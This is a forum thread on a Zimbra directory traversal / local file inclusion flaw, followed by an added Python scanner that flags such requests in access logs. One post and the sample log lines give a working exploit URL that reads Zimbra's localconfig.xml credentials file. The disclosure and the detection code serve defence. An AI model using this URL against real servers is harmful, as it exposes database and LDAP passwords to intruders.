Thread: Zimbra - 0day exploit / Privilege escalation via LFI

  1. #1
    joelserrano

    Zimbra - 0day exploit / Privilege escalation via LFI

    Hi,

    Just wanted to inform the forum about this:

    Zimbra - 0day exploit / Privilege escalation via LFI

    If anybody has ZimbraAdmin publicly accessible, please protect yourself until Zimbra releases a patch/update.

    Best regards,
    Joel.

  2. #2
    phoenix (Zimbra Consultant & Moderator)

    Quote Originally Posted by joelserrano
    If anybody has ZimbraAdmin publicly accessible, please protect yourself until Zimbra releases a patch/update.
    There is no vulnerability in the current version of ZCS. Did you not see any of the other recent posts on this topic or the two posts from Zimbra that describe the status of this vulnerability?
    Regards
    Bill

  3. #3
    joelserrano

    Quote Originally Posted by phoenix
    There is no vulnerability in the current version of ZCS. Did you not see any of the other recent posts on this topic or the two posts from Zimbra that describe the status of this vulnerability?
    Well, to be honest, no, I just posted about it. Sorry if this is a duplicate (or triplicate) thread. It did feel strange to not see anybody talking about it.


    Best regards,

  4. #4
    ljramos

    I have the same issue. Is there a patch/fix for version 6.0_16?

  5. #5
    phoenix (Zimbra Consultant & Moderator)

    Quote Originally Posted by ljramos
    I have the same issue. Is there a patch/fix for version 6.0_16?
    No there isn't, you need to upgrade to either the 7.2.6 or 8.0.6 version of ZCS.
    Regards
    Bill

  6. #6

    7.2.6 still affected

    Quote Originally Posted by phoenix
    No there isn't, you need to upgrade to either the 7.2.6 or 8.0.6 version of ZCS.
    We upgraded to 7.2.6, but the directory traversal bug or file inclusion bug is still not fixed. You can download any file through TemplateMsg.js.zgz.

    The well-known example:
    Code:
    https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
    After fixing this bug everyone should change the master passwords in the localconfig.xml, especially mysql and ldap.
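For administrators who want to know whether the request pattern shown in the post above has already hit their server, the following is an added example (not code from the thread or from Zimbra) that scans web-server access log lines in combined log format and flags query parameters carrying `../` traversal or a null byte, after percent-decoding them repeatedly so double-encoded variants are caught too. The log lines, IP addresses and host are constructed for the example; the URL shape follows the one posted above.

```python
"""Flag access-log requests whose query parameters carry path-traversal or
null-byte payloads, such as the skin= parameter of Zimbra's res/*.js.zgz
endpoint discussed in this thread.  Added example; all log lines below are
constructed and use documentation IP ranges."""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache/nginx combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Dec/2013:17:54:50 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
203.0.113.7 - - [09/Dec/2013:17:54:51 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=..%2F..%2F..%2F..%2Fopt%2Fzimbra%2Fconf%2Flocalconfig.xml%2500 HTTP/1.1" 200 4215 "-" "Mozilla/5.0"
198.51.100.2 - - [09/Dec/2013:17:55:01 +0000] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=serenity HTTP/1.1" 200 101283 "-" "Mozilla/5.0"
198.51.100.9 - - [09/Dec/2013:17:56:12 +0000] "POST /service/soap HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e, %2500) are seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return (param, decoded_value, reason) for each query parameter that
    looks like a traversal / local file inclusion attempt."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl already performs one round of percent-decoding.
    for name, raw in parse_qsl(query, keep_blank_values=True):
        val = fully_decode(raw)
        norm = val.replace("\\", "/")  # treat backslash traversal like forward slash
        if "\x00" in val:
            findings.append((name, val, "null byte"))
        elif "../" in norm or norm.startswith("/"):
            findings.append((name, val, "path traversal"))
    return findings


def scan_log(text):
    """Return one alert dict per log line that has a suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        hits = suspicious_params(m["target"])
        if hits:
            alerts.append({
                "ip": m["ip"], "ts": m["ts"], "status": m["status"],
                "path": urlsplit(m["target"]).path, "hits": hits,
            })
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        for name, val, reason in a["hits"]:
            print(f'{a["ts"]} {a["ip"]} {reason} in {name}={val!r} -> {a["path"]} (HTTP {a["status"]})')
```

A status of 200 on a flagged line is the signal to take seriously: it means the server handed something back, and the advice in the post above (rotate every secret in localconfig.xml, MySQL and LDAP first) applies. A 404 or 403 on the same pattern still records an attempt worth correlating with the source address.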
